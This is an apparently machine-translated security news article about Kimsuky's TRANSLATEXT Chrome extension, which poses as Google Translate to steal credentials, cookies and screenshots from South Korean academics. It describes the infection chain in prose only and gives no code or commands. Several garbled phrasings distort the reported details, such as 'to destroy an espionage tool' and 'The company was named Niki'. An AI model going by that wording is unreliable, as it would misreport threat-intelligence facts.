Close Menu
Indo Guard OnlineIndo Guard Online
  • Home
  • Cyber Security
  • Risk Management
  • Travel
  • Security News
  • Tech
  • More
    • Data Privacy
    • Data Protection
    • Global Security
What's Hot

Google exposes Vishing Group UNC6040 target on Salesforce with a fake app for a data loader

June 4, 2025

Malicious Chaos Rats are aimed at Windows and Linux via fake network downloads

June 4, 2025

Why do traditional DLP solutions do not get in the browser era

June 4, 2025
Facebook X (Twitter) Instagram
Facebook X (Twitter) Instagram YouTube
Indo Guard OnlineIndo Guard Online
Subscribe
  • Home
  • Cyber Security
  • Risk Management
  • Travel
  • Security News
  • Tech
  • More
    • Data Privacy
    • Data Protection
    • Global Security
Indo Guard OnlineIndo Guard Online
Home » Kimsuky uses the TRANSLATEXT Chrome extension to steal sensitive data
Global Security

Kimsuky uses the TRANSLATEXT Chrome extension to steal sensitive data

AdminBy AdminJuly 7, 2024No Comments3 Mins Read
Chrome Extension
Share
Facebook Twitter LinkedIn Pinterest Email Copy Link


June 28, 2024Information hallCyber ​​espionage / Cyber ​​attack

Chrome extension

A North Korean-linked threat actor known as Kimsuki has been linked to the use of a new malicious Google Chrome extension designed to steal sensitive information as part of ongoing intelligence-gathering efforts.

Zscaler ThreatLabz which is observed in early March 2024, the extension was codenamed TRANSLATEXT, highlighting its ability to collect email addresses, usernames, passwords, cookies, and browser screenshots.

The targeted campaign is believed to have been directed against South Korean academics, particularly those involved in North Korean political affairs.

Kimsuki is a a famous hacking team from North Korea, which is known to have been active since at least 2012, orchestrating cyberespionage and financially motivated attacks targeting South Korean organizations.

Cyber ​​security

A sister group to the Lazarus cluster and part of the Intelligence General Bureau (RGB), it is too is tracked under the names APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet, Springtail and Velvet Chollima.

In recent weeks, the group has armed known security flaw in Microsoft Office (CVE-2017-11882) to spread keylogger and used work-themed lures in attacks targeting the aerospace and defense sectors to destroy an espionage tool with data collection functions and the execution of a secondary payload.

“The backdoor, which does not appear to have been publicly documented before, allows an attacker to perform basic reconnaissance and drop additional payloads to hijack or remotely control a machine,” cyber security company CyberArmor. said. The company was named Niki.

Chrome extension

The exact mode of initial access associated with the newly discovered activity is currently unclear, although the group is known to use phishing and social engineering attacks activate the infection chain.

The starting point of the attack is a ZIP archive that purports to be about Korean military history and contains two files: a Hangul text document and an executable file.

Running the executable causes a PowerShell script to be retrieved from a server controlled by the attacker, which in turn exports information about the compromised victim to a GitHub repository and loads additional PowerShell code using a Windows Shortcut (LNK) file.

Zscaler said he found it A GitHub accountcreated on February 13, 2024, briefly hosting the TRANSLATEXT extension under the name “GoogleTranslate.crx”, although its delivery method is currently unknown.

Cyber ​​security

“These files were in storage on March 7, 2024 and were deleted the next day, which means that Kimsuki intended to minimize exposure and use the malware for a short period to target specific individuals,” said security researcher Seongsoo Park.

TRANSLATEXT, which pretends to be Google Translate, includes JavaScript code to bypass the security measures of services such as Google, Kakao and Naver; browse email addresses, credentials and cookies; take screenshots of the browser; and steal the stolen data.

It is also designed to receive commands from the Blogger Blogspot URL to take screenshots of recently opened tabs and delete all cookies from the browser, among other things.

“One of the main tasks of Kimsuki’s group is to conduct surveillance on academic and government personnel in order to gather valuable intelligence,” Park said.

Did you find this article interesting? Follow us Twitter  and LinkedIn to read more exclusive content we publish.





Source link

Share. Facebook Twitter Pinterest LinkedIn Tumblr Email Copy Link
Admin
  • Website

Related Posts

Google exposes Vishing Group UNC6040 target on Salesforce with a fake app for a data loader

June 4, 2025

Malicious Chaos Rats are aimed at Windows and Linux via fake network downloads

June 4, 2025

Why do traditional DLP solutions do not get in the browser era

June 4, 2025

Packages malicious Pypi, NPM and Rubin

June 4, 2025

HPE releases security patch for Storeonce error, which allows by -by -distance authentication

June 4, 2025

Fake Docusign, Gitcode Sites Distributed Netsupport Rat Through Multiple Attack PowerShell

June 3, 2025
Add A Comment
Leave A Reply Cancel Reply

Loading poll ...
Coming Soon
Do You Like Our Website
: {{ tsp_total }}

Subscribe to Updates

Get the latest security news from Indoguardonline.com

Latest Posts

Google exposes Vishing Group UNC6040 target on Salesforce with a fake app for a data loader

June 4, 2025

Malicious Chaos Rats are aimed at Windows and Linux via fake network downloads

June 4, 2025

Why do traditional DLP solutions do not get in the browser era

June 4, 2025

Packages malicious Pypi, NPM and Rubin

June 4, 2025

HPE releases security patch for Storeonce error, which allows by -by -distance authentication

June 4, 2025

Fake Docusign, Gitcode Sites Distributed Netsupport Rat Through Multiple Attack PowerShell

June 3, 2025

Critical 10-year Error Webmail RoundCube allows users to run the malicious code

June 3, 2025

Understanding the scammers and how to defend their organization

June 3, 2025
About Us
About Us

Provide a constantly updating feed of the latest security news and developments specific to Indonesia.

Facebook X (Twitter) Pinterest YouTube WhatsApp
Our Picks

Google exposes Vishing Group UNC6040 target on Salesforce with a fake app for a data loader

June 4, 2025

Malicious Chaos Rats are aimed at Windows and Linux via fake network downloads

June 4, 2025

Why do traditional DLP solutions do not get in the browser era

June 4, 2025
Most Popular

In Indonesia, crippling immigration ransomware breach sparks privacy crisis

July 6, 2024

Why Indonesia’s Data Breach Crisis Calls for Better Security

July 6, 2024

Indonesia’s plan to integrate 27,000 govt apps in one platform welcomed but data security concerns linger

July 6, 2024
© 2025 indoguardonline.com
  • Home
  • About us
  • Contact us
  • Privacy Policy

Type above and press Enter to search. Press Esc to cancel.